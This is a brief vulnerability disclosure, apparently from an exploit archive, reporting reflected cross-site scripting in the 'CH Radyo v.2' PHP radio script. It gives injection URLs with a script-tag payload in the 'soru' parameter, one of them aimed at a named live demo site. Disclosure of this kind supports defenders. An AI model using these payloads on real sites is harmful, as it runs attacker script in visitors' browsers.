CH Radyo version 2 suffers from a cross site scripting vulnerability.
95265fbd37841720fb5bf8e5197aca25646f020cd47a6eb5df051526fb31b8bc
=====================================================
CH Radyo v.2 php script Cross Site Scripting Vulnerability
-----------------------------------------------------------
foun by :kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
prich :59 TL (turkish mony)
prich
from:http://www.scripti.org/script_ch-radyo-scripti_3292_27.html
demo script :http://radyo1.indircen.com
(tested by Maxthon Cloud Browser , firefox)
-----------------------------------------------------------
Exploit:
-------
site.com/path/index.html?soru="><script>alert('explo3ter')</script>
site.com/path/mplayer/index.html?soru="><script>alert('explo3ter')</script>
-------
demo :
http://radyo1.indircen.com/mplayer/index.html?soru="><script>alert('explo3ter')</script>
-----------------------------------------------------------
Zryan_kurd ,hamw andamani p4kurd.com
-----------------------------------------------------------